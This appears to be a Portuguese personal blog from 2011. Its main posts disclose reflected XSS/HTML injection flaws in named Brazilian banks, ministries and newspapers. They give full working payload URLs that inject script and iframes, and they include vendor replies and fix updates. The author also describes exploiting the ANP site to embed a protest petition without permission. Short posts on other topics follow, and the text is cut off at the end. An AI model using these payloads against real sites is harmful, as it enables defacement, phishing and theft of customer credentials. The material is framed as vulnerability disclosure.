Durante a
entrevista que concedi a Rede Brasil Atual me perguntaram se eu tinha testado a falha em outros sites de bancos, eu respondi que não, que a minha intenção era os sites dos
Ministérios. Mas quando cheguei em casa (já falei que sou curioso) comecei a testar em alguns bancos.
Logo já apareceram alguns:
- Banco Alfa
- BRB (Banco de Brasília)
- BANESE (Banco do Estado de Sergipe)
- BANESTES (Banco do Estado do Espírito Santo)
- BANRINSUL (Banco do Estado do Rio Grande do Sul)
- BRP (Banco Ribeirão Preto)
- BSMB (Banco Sumitomo Mitsui Brasileiro)
Os bancos gastam muito dinheiro com segurança e sempre vendem aquela velha falsa sensação de segurança para os clientes. Todos os sites que acessei foram via
https, aquele cadeado de segurança que aparece no
Navegador, o que não quer dizer nada, se o banco não faz a parte dele.
Além dos bancos, alguns outros sites .gov.br:
- ANVISA (Agência Nacional de Vigilância Sanitária)
- TCEMG (Tribunal de Contas do Estado de Minas Gerais)
Outras empresas:
Da mesma forma que fiz antes (
Segurança Nacional), enviei email para todos os órgãos envolvidos e estou aguardando alguma resposta. Happy Hack!
Screenshots:
Bancos
.gov.br
Outras empresas
Segue os links com as páginas alteradas, para confirmar
Bancos
*
Banco Alfa (ou
sem JavaScript)
https://wwws.alfanet.com.br/busca.aspx?__VIEWSTATE=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_alfa/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
BANESE - Banco do Estado de Sergipe (ou
sem JavaScript)
https://wwws.banese.com.br/netbanking/index.jsp?Agencia="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_banese/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
BANESTES - Banco do Estado do Espírito Santo (ou
sem JavaScript)
https://wwws.banestes.com.br/cgi-bin/IB_Login?gb=passa&ct="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_banestes/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
BANRINSUL - Banco do Estado do Rio Grande do Sul (ou
sem JavaScript) (Fixed! Corrigido!)
https://www.banrisul.com.br/bob/link/BOBW12HW_busca.asp?palavra=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_banrinsul/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
BRB - Banco de Brasília (ou
sem JavaScript)
https://banknet.brb.com.br/brbBanknet/conteudoIframe.jsp?usuario=&ageconta="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_brb/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
BRP - Banco Ribeirão Preto (ou
sem JavaScript)
https://netbanking.brp.com.br/NetBanking/c_brp.asp?NumConta="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_brp/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
BSMB - Banco Sumitomo Mitsui Brasileiro (ou
sem JavaScript)
http://www.smbcgroup.com.br/searchBrasilp/?SearchView&Query=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_smbc" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
.gov.br
*
ANVISA - Agência Nacional de Vigilância Sanitária (ou
sem JavaScript)
https://sngpc.anvisa.gov.br/AcessoPersistir.asp?senha=a&email=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/anvisa/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
TCEMG - Tribunal de Contas do Estado de Minas Gerais
http://www.tce.mg.gov.br/?cod_secao=5P&tipo=2&url=Pesquisa_Processo.asp&cod_secao_menu=5K&cpf="></td></tr></table><iframe src="http://gnu.org" width="500" height="300">
Outras empresas
*
IG (ou
sem JavaScript)
http://busca.igbusca.com.br/app/search?first_o=IG&q="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/ig/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
UNIMED (ou
sem JavaScript)
http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=49103&query="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/unimed/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
UPDATE 24/05/2001 - 14h03
Mensagem do BANRINSUL:
Prezado Marcelo,
Esta vulnerabilidade já havia sido identificada pelos nossos técnicos e estava em processo de correção.
Graças ao seu comunicado este procedimento foi priorizado e a vulnerabilidade corrigida.
Agradecemos seu contato.
UPDATE 24/05/2001 - 18h00
BANESTES corrigiu pela metade a falha, retirando o método GET e deixando o POST =/
Além disso, existem outras URLs e parâmetros com a falha que você pode testar aqui e aqui.
UPDATE 25/05/2001 - 11h15
BRP corrigiu pela metade a falha (você pode ver aqui), mas já agradeceu:
Marcelo,
O Banco BRP agradece pela sua informação.
Att.
Tecnologia da Informação
Banco BRP
UPDATE 25/05/2001 - 15h35
BRP corrigiu tudo
De: "Marcelo Jorge Vieira" <metal@mundobugado.org>
Para: "ANP Imprensa" <imprensa@anp.gov.br>, "CAIXA - Imprensa" <imprensa@caixa.gov.br>, "Jorge Fontes Hereda" <presidencia@caixa.gov.br>, "Joaquim Lima de Oliveira" <vitec@caixa.gov.br>, "CEB - Comunicação Social" <prcoe@ceb.com.br>, "Conselho de Consumidores da CEB" <conselho.ceb@ceb.com.br>, "Glaucius Oliva" <presidencia@cnpq.br>, "CNPq Ascom" <comunicacao@cnpq.br>, "Olímpio Cruz" <olimpio.cruz@agricultura.gov.br>, "MMA Ascom" <imprensa@agricultura.gov.br>, "Maria Lucia Muniz" <mlmuniz@mct.gov.br>, "MCT Ascom" <ascomt@mct.gov.br>, "Maristela Rangel Pinto" <cgm@cultura.gov.br>, "Nanan Catalão" <nanan.catalao@cultura.gov.br>, "Denise Mantovani" <denise.mantovani@mda.gov.br>, "MDA Ascom" <comunicacao.social@mda.gov.br>, "Nunzio Briguglio Filho" <nunzio@mec.gov.br>, "MEC Ascom" <imprensa@mec.gov.br>, "Ramiro Alves" <ramiro.alves@fazenda.gov.br>, "MF Ascom" <acs@fazenda.gov.br>, "Gerusa Barbosa" <gerusa.barbosa@mma.gov.br>, "MMA Ascom" <ascom@mma.gov.br>, "Antônio Carlos" <aclima@mme.gov.br> ,"MME Ascom" <ascom@mme.gov.br>, "Vanice Cioccari" <vanice.cioccari@mj.gov.br>, "MJ Ascom" <acs@mj.gov.br>, "PBH Ascom" <ascom@planejamento.mg.gov.br>, "Walter Carlos Auad Sotomayor" <walter.sotomayor@turismo.gov.br>, "Turismo Ascom" <imprensa@turismo.gov.br>, "Selvino Heck" <mobsocial@planalto.gov.br>, "Casa Civil da Presidência da República" <mprensaccivil@presidencia.gov.br>, "Benjamin Zymler" <min-bz@tcu.gov.br>, "Augusto Nardes" <min-an@tcu.gov.br>, "Estadão - Fale com" <falecom.estado@grupoestado.com.br>, "Estadão - Portal" <portal@grupoestado.com.br>, "Nelson Nunes" <nnunes@diariosp.com.br>, "Carlos Alencar" <carlos.alencar@diariosp.com.br>, "Ulisses Oliveira" <ulisses.oliveira@diariosp.com.br>, "Teodomiro Braga" <teodomiro@otempo.com.br>, "Fábio A. Santos" <tecnologia@otempo.com.br>, "Luiz Fernando Rocha" <luizrocha@otempo.com.br>, "Mylena Fiori" <mfiori@cartamaior.com.br>, "Carta Maior - Redação" <redacao@cartamaior.com.br>, "Terra - Abuse" <abuse@terra.com.br>, "Terra - Editorial" <editorial@terra.com.br>, "Roberto Borges Martins" <presidencia@redeminas.mg.gov.br>, "Hugo Teixeira" <hugoteixeira@redeminas.mg.gov.br>, "Franco Brostel Nunes Leal" <franco@redeminas.mg.gov.br>, "Luiz Silvério Pereira Meireles" <ditec@redeminas.mg.gov.br>, "Rodolfo Fernandes" <rodolfo@oglobo.com.br>, "Maria Fernanda Delmas" <fernanda.delmas@oglobo.com.br>, "Ascânio Seleme" <ascanio@oglobo.com.br>, "Folha Emergência" <folhaemergencia@uol.com.br>, "Folha Poder" <politica@uol.com.br>, "Ministério da Defesa" <imprensa@defesa.gov.br>, "Ministério da Defesa - Ascom" <ascom@defesa.gov.br>,
Olá,
No início do mês de Abril, eu descobri uma falha no site da ANP (Agência Nacional do Petróleo), que eu explorei para mudar a visualização do site, inserindo um formulário, um abaixo-assinado, onde um visitante poderia assinar seu nome como uma forma de protesto aos altos preços dos combustíveis.
Essa falha (primária) não altera o conteúdo do site, apenas muda a visualização e só funciona, se o usuário clicar em um link "batizado" com parâmetros específicos, como, por exemplo, o link abaixo usado para inserir o formulário no site da ANP: http://www.anp.gov.br/?q=<iframe src='http://mundobugado.org/anp'> (o link não funciona mais, o pessoal da ANP já consertou a falha nesse ponto).
No meu blog, tem um relato explicando melhor o caso da
ANP e o Mundo Bugado.
Como sou curioso, quis saber se outros sites também apresentavam a mesma falha. Minha mãe sempre diz: Quem procura, acha! E é claro que eu achei e não foram poucos.
.gov.br:
- ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)
- Brazilian Tourism Portal (Ministério do Turismo)
- CAIXA (O banco que acredita nas pessoas)
- CEB (Companhia Energética de Brasília)
- Domínio Público (Ministério da Educação)
- Embratur (Ministério do Turismo)
- MF (Ministério da Fazenda)
- MINC (Ministério da Cultura
- MMA (Ministério do Meio Ambiente)
- MME (Ministério de Minas e Energia)
- MDA (Ministério do Desenvolvimento Agrário)
- MCT (Ministério da Ciência e Tecnologia)
- Portal da Transparência (Presidência)
- Plataforma Lattes (CNPq)
- SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)
- TCU (Tribunal de Contas da União)
Jornal/TV:
- Estadão
- Carta Maior
- O TEMPO
- Diário de São Paulo
- Terra
- Rede Minas
O que eu quero com esse email?! Reportar essa falha, porque ela poderia ser explorada de várias maneiras:
- Uma pessoa mal intencionada poderia substituir a página inicial da CAIXA para "roubar" as contas de alguns clientes.
- Usar o site do Ministério da Cultura para falar mal da Ministra, uma vez que surgiram vários temas relacionados à ela nos últimos dias.
- Fazer mais uma campanha sobre os altos preços dos combustíveis no site da ANP.
- Usar o site do Ministério da Fazenda para falar que não é mais preciso declarar Imposto Renda.
- Publicar todas as falsas notícias no ESTADÃO, no Diário de São Paulo, no O Tempo, no Terra, na Carta Maior e na Rede Minas.
Com essa coleção de sites, é bem fácil criar uma rede de intrigas, verdades ou mentiras, como, por exemplo, "O brasil desistiu de sediar a copa", "O brasil vai vender a Amazônia", etc.
Por todos os motivos citados acima, essa falha é uma questão de Segurança Nacional.
Estou enviando e publicando esse email, porque não acredito no contato privado com suas instituições. A ANP demonstrou muito bem esse ponto ao não assumir a falha no site e no sistema de preços, e ainda fazer um comunicado sobre um endereço falso circulando na Internet e ao mesmo tempo retirar o sistema de consulta dos preços do ar.
Segue os links com as páginas alteradas, para confirmar
.gov.br:
*
ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis) (Fixed! Corrigido!)
http://www.anp.gov.br/SITE/acao/estaaqui/?s1=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/anp/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
Brazilian Tourism Portal (Ministério do Turismo)
http://www.braziltour.com/busca.html?search=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/braziltour/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220</code>%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E
*
CAIXA (O banco que acredita nas pessoas)
http://www1.caixa.gov.br/busca/resultados.asp?q2=1&q1=%27%29;}%29;%3C/script%3E%3Ciframe%20src=%22http://metal.mundobugado.org/caixa/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C!--
*
CEB (Companhia Energética de Brasília)
http://www.ceb.com.br/Ceb/aplicacoes/index.cfm?fuseaction=busca.realizarbusca&pesquisa=%3Ciframe%20src=%22http://metal.mundobugado.org/ceb/%22%20width=%221260%22%20height=%222500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E
*
Domínio Público (Ministério da Educação) (Fixed! Corrigido!)
http://www.dominiopublico.gov.br/pesquisa/PesquisaAutorResultadoForm.do?letra=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/dominiopublico/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E
*
Embratur (Ministério do Turismo)
http://www.embratur.gov.br/site/br/busca/busca.php?palavra=','')"><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/embratur/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
MF (Ministério da Fazenda) (Fixed! Corrigido!)
http://www.fazenda.gov.br/busca.asp?pesquisa=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/fazenda/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--
*
MINC (Ministério da Cultura)
http://fale.cultura.gov.br/sisouvidor/login/formularioLogin.jsp?UsuarioInvalido=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/minc/" width="1260" height="9100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
MMA (Ministério do Meio Ambiente)
http://www.mma.gov.br/sitio/index.php?ido=conteudo.pesquisa&busca=%22%3C/h2%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/mma/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E
*
MME (Ministério de Minas e Energia)
http://www.mme.gov.br/mme/buscaresult.html?field=content&index=indice_mme&query=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mme/%22%20width=%221260%22%20height=%223500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E
*
MDA (Ministério do Desenvolvimento Agrário)
http://mda.gov.br/sistemas/sistemasmda/index.php?msg=%3Cscript%3E$%28function%28%29{%20$%28%22body%22%29.empty%28%29.append%28%22%3Cbody%20style=%27margin:%200px%200px%27%3E%3Ciframe%20src=%27http://metal.mundobugado.org/mda/%27%20width=%271260%27%20height=%273200%27%20frameborder=%270%27%20marginheight=%270%27%20marginwidth=%270%27%20scrolling=%27no%27%3E%3C/body%3E%22%29%20}%29
*
MCT (Ministério da Ciência e Tecnologia)
http://www.mct.gov.br/index.php?action=/html/objects/search_result&searchquery=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload%20=%20function%28%29%20{%20document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mct/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%20}%3C/script%3E%3C!--
*
Portal da Transparência (Presidência)
http://www.portaltransparencia.gov.br/despesasdiarias/resultado?consulta=rapida&periodoInicio="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/portaltransparencia/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
Plataforma Lattes (CNPq)
http://buscatextual.cnpq.br/buscatextual/busca.do?metodo=buscar&textoBusca=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/cnpq\%22%20%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E
*
SINDEC (Sistema Nacional de Informações de Defesa do Consumidor) (Fixed! Corrigido!)
https://sindecbh.pbh.gov.br:444/sindecconsulta/?msg=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/sindec/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--
*
TCU (Tribunal de Contas da União)
https://login.tcu.gov.br/sso/jsp/login.jsp?site2pstoretoken=&p_submit_url=&p_cancel_url=&locale=%22%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Ftcu%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E
Jornal/TV:
*
Estadão (Fixed! Corrigido!)
http://www.estadao.com.br/busca/%3C%2Ftitle%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Festadao%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E
*
Carta Maior
http://cartamaior.com.br/templates/buscaExecutar.cfm?busca=%3C/title%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/cartamaior/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--
*
O TEMPO
http://www.otempo.com.br/videos/lista/?busca=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/otempo/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E
*
Diário de São Paulo
http://www.diariosp.com.br/?id=%2Fbusca.php&ds_busca=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/diariosp/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
*
Terra (Fixed! Corrigido!)
http://buscador.terra.com.br/Default.aspx?source=Search&ca=s&query=%3C/title%3E%3Ciframe%20src=%22http://is.gd/lCgKDa%22%20width=1260%20height=2100%20frameborder=0%20scrolling=%22no%22%3E%3C!--
*
Rede Minas
http://www.redeminas.mg.gov.br/search/node/%22%3E%3C/a%3E%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http%3A/%252Fmetal.mundobugado.org/redeminas/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%7D%3C/script%3E
O que é HTML Injection ou XSS (Cross-site scripting)?
HTML Injection é um tipo de vulnerabilidade encontrada normalmente em sistemas Web e é explorada com a inserção de código HTML/JavaScript nos parâmetros de um formulário, por exemplo. Não faz nenhuma mudança nos arquivos do servidor, apenas muda a visualização dos dados para o usuário.
O que é HTML?
"
HTML (acrônimo para a expressão inglesa HyperText Markup Language, que significa Linguagem de Marcação de Hipertexto) é uma linguagem de marcação utilizada para produzir páginas na Web" -- Wikipédia
O que é JavaScript?
JavaScript é uma linguagem de programação muito utilizada para produzir páginas na Web.
Como resolver?
Remover todas as tags HTML de todos os parâmetros. Para cada linguagem utilizada para produzir o site, existe uma forma de remover as tags:
ASP,
PHP,
Python,
Java.
-------
UPDATE 17/05/2011 - 20h34
ANP, Dominio Público e Terra corrigiram as "brechas".
UPDATE 18/05/2011 - 00h07
ESTADÃO corrigiu a "brecha".
UPDATE 18/05/2011 - 11h12
Caro Marcelo,
A falha mencionada foi corrigida, agradecemos a notificação.
Atenciosamente,
Lucas Betti Domingues
Equipe de Segurança Terra - Depto. de Abuse
abuse@terra.com.br
SAN - Servico de Atendimento Nacional
Fax: (51) 3287-9087
UPDATE 19/05/2011 - 11h33
SINDEC corrigiu a "brecha".
UPDATE 23/05/2011 - 23h32
A CAIXA corrigiu a brecha pela metade, mas já foi um avanço. Vocês podem testar aqui e aqui para comprovar que ainda existe a falha.
UPDATE 07/06/2011 - 17h08
O MF (Ministério da Fazenda) corrigiu a brecha. De um jeito tosco, mas corrigiu... agora eles retiram da busca os caracteres "<" e ">"
Você já tentou levantar os tapetes no corredor pra ver se tem alguma chave embaixo?
Depois do
HTML Injection no site da ANP, fiquei com a pulga atrás da orelha, curioso, pra saber se outros
sites também apresentavam a mesma falha. Minha mãe sempre diz: Quem procura, acha! E é claro que eu achei e não foram poucos.
.gov.br
Jornais
Após duas semanas revoltado com o alto preços dos combustíveis, decidi na madrugada do dia 05/04 fazer um
post no
twitter e
identi.ca mostrando como foi abusivo o aumento do etanol (álcool) aqui em Brasília, que passou de
R$ 2,02 para
R$ 2,83.
Comentando com o
Thiago Silva, ele falou que existia um sistema onde era possível visualizar os preços dos combustíveis em todo o Brasil. Acessamos o site da
ANP e realmente o sistema possuía os preços atualizados por cidades e períodos. Observei que o formulário de pesquisa usava o método
POST e não gerava uma
URL amigável impossibilitando que eu mostrasse como estava caro os preços em
Brasília. Como tenho conhecimento em
HTML, comecei a ler o código do formulário para tentar gerar uma
URL via método
GET para conseguir publicar o link sobre o preço dos combustíveis em Brasília, para que outras pessoas acessassem diretamente a tabela de preços ao invés de preencher o formulário.
Acabei descobrindo que os campos "
hidden", como por exemplo, o campo "selMunicipio" estava preenchido assim "
1778*BRASILIA" e o campo "selSemana" estava "
615*De 27/03/2011 a 02/04/2011". Percebendo isso, minha primeira reação foi tentar alterar o campo "selMunicipio" de "
1778*BRASILIA" para "
1778*A", e não é que apareceu escrito "
A" ao invés de "
BRASILIA", lá no site da
ANP?! Mudei o "selMunicipio" para "
1778*BRASILIA A CIDADE SEM LEI" e o "selSemana" para "
615*De 27/03/2011 a 02/04/2011~INFINITO E ALEM" e publiquei a
URL modificada aqui
[1] e aqui
[2].
Fiz mais um teste tentando colocar código HTML junto ao texto na
URL e também funcionou. Ooooops ficou mais sério a falha de segurança.
Em paralelo aos testes, estava acontecendo muita conversa sobre os preços altos dos combustíveis e muita gente estava usando a hashtag
combustivelmaisbaratoja.
Tive a ideia de fazer um abaixo-assinado e contribuir no assunto. Pensei em alguns métodos de como inserí-lo dentro da página da
ANP, uma vez que eu consigo inserir código HTML na
URL. Alguns minutos conversando com o Thiago, tive a ideia de usar um
iframe. Comecei a desenvolver o formulário usando
python-pesto,
python-sqlalchemy e em alguns minutos depois estava pronto. Discutimos sobre onde hospedar e quais seriam as implicações. Decidimos hospedar o formulário no nosso próprio domínio
mundobugado.org, numa forma de assumir, porque a nossa intenção era também demonstrar a falha no site e não só protestar.
Publiquei
[1] e
[2] a
URL com o iframe e várias pessoas repassaram o link.
http://www.anp.gov.br/preco/prc/Resumo_Por_Municipio_Posto.asp?Tipo=2&cod_Semana=615&desc_Semana=A&selCombustivel=643*A&selMunicipio=1778*BRASILIA%20A%20CIDADE%20SEM%20LEI&selSemana=615*De%2027/03/2011%20a%2002/04/2011~INFINITO%20E%20ALEM%3Ciframe%20src=%27http://mundobugado.org/anp%27%20height=%27500%27%20width=%27500%27%3E%3C/iframe%3E%3C!--
imagem via
yaso:
No dia seguinte, dia 06/04, a
ANP retirou o
Sistema de Pesquisa de Preços do ar. Procurei
saber o motivo, se era por nossa causa, e era. No
microblog tinha o seguinte alerta:
Um
alerta mentiroso, uma vez que usamos a própria
URL do site da
ANP e não algo como "anp.com.br" ou "anp.net", etc. (Um dúvida minha, qual é a relação entre formulário falso e o sistema estar em manutenção?! Pura desculpa para uma falha deles?!). Algum tempo depois, vários sites replicaram o alerta
[1],
[2],
[3],
[4].
Olhei alguns códigos do site da
ANP e encontrei outras brechas
[1] e
[2]. Agora, não só o Sistema de Pesquisa de Preços estava com a falha, mas a maior parte dos formulários do site, incluindo a busca principal.
ANP, agora vocês vão retirar o site todo do ar? E vão usar o que como desculpa pela mal programação?!
Optei agora por não espalhar a
URL com o iframe e avisei
[1] e
[2] a
ANP sobre as falhas, mas até agora não recebi uma resposta.
O lado negativo de tudo isso, é que uma falha boba, de fácil solução, deixou o sistema 24h ~ ao infinito e além fora do ar. Me deixando com a pulga atrás da orelha, pensando que mesmo que a
TI da ANP demore pra corrigir a falha, o lado político de deixar o sistema fora do ar nesse momento de grande procura dos dados. Uma pena...
Espero ter esclarecido o que aconteceu.
Happy hack!
ATUALIZAÇÂO: 08/04/2011 18h20
O
Sistema de Pesquisa de Preços esta no ar novamente e parece corrigido. Mas reparei que a busca do site sumiu, que foi o meu outro bug report. Será que a ANP vai fazer uma nota sobre o assunto?!
ATUALIZAÇÂO: 08/04/2011 20h52
A busca no site da ANP ainda não voltou =/ Mas sexta-feira, numa hora dessas, deve ficar o fim de semana todo sem a busca. Espero que corrijam todas as falhas do mesmo tipo que levantei sobre
HTML Injection e não só os dois formulários bugados que citei nesse "artigo". Para isso, tenho mais um formulário bugado para testar, agora é esperar pra ver.
ATUALIZAÇÂO: 11/04/2011 22h18
Olhei de manhã, de tarde, mas agora a busca no site ANP está de volta e corrigida.
Mas, e as outras falhas, quando serão corrigidas?!
No dia 24/05/2010 eu li sobre a
nova revisão da distribuição multimídia juntaDados 1.04r3. Achei interessante porque eu sabia que a
Fabiana "Goa" e o
Marcelo Souza estavam envolvidos, uma vez que trabalhei no
minC e eles fazem parte de um dos
Pontões de Cultura Digital. Lendo sobre a nova revisão do juntaDados reparei que não falava do código fonte, então comentei sobre isso na
sala XMPP da
MinasLivre. O
Gustavo 'kov' Noronha entrou no fórum e fez um comentário perguntando sobre o código fonte. Ele recebeu uma resposta falando que era o mesmo código do
Ubuntu e que se ele quisesse era só pegar os fontes nos mirrors do Ubuntu, porque eles não tinham infra-estrutura para manter o código fonte, que na minha opinião é uma desculpa boba, uma vez que eles podiam gerar um ISO com os fontes (a resposta publicada no dia foi editada e eu não tenho a original, mas tenho uma
cópia de segurança do que esta publicado hoje).
No dia 21/06/2010 saiu a
nova versão 2.04 e novamente eles não falaram sobre o código fonte. Dessa vez, eu fiz um comentário no fórum. O
Thadeu 'GNU' Cascardo aproveitou o comentário que fiz e argumentou um pouco mais. Após esse comentário
a conversa desandou totalmente (ainda bem que fiz essa cópia de segurança). O pessoal do juntaDados
editou e
apagou vários comentários e logo em seguida fecharam os comentários. Mas o pior, foi apagar todo o histórico da conversa algum tempo depois. E para piorar de vez, recebo um email de alguém do juntaDados com cópia para o kov e o cascardo. Aqui esta o
primeiro email do juntaDados; A
resposta do kov; Outro
email do juntaDados; A
minha resposta ao primeiro email do juntaDados; A
minha resposta ao segundo email do juntaDados.
Depois de toda essa confusão eu decidi publicar toda a história para documentar o que aconteceu, mas de lá pra cá aconteceram mil coisas e eu acabei me enrolando. Mas antes tarde do que nunca.
Eu sempre me surpreendo quando vejo pessoas que trabalham com Software Livre que não sabem receber críticas. Não quero ser Polícia batendo na porta das pessoas, mas custa fazer direito?!
Estou a algumas semanas tentando fazer meu
evolution filtrar emails "junk". Instalei o
bogofilter, o
spamassassin, habilitei os plugins no evolution e marquei todas as mensagens que eram junk (~300), torci pela primeira vez pra receber um
spam , ele veio e não funcionou. Perguntei pro
cascardo e também para o
phractal se eles sabiam como habilitar. O phractal falou que no evolution dele funcionava perfeitamente. Verifiquei com ele e as configurações estavam iguais. Apaguei a minha wordlist (~/.bogofilter/wordlist.db) e marquei novamente os spams como "junk". Torci pela segunda vez pra receber um spam, ele veio e também não funcionou.
Hoje, lendo a blogada do
Jack Wallen, descobri que eu estava treinando errado o meu filtro. É preciso marcar os emails que não são "junk" como "junk" e depois desmarcá-los. Fiz isso e torci pela terceira vez. O spam veio e foi direto pra minha pasta "junk", yeah!
A um 1 atrás eu me formei (mas até hoje não busquei o diploma) e como projeto final, eu fiz um cliente
Jabber/XMPP que armazena links de
feeds XML (
RSS ou
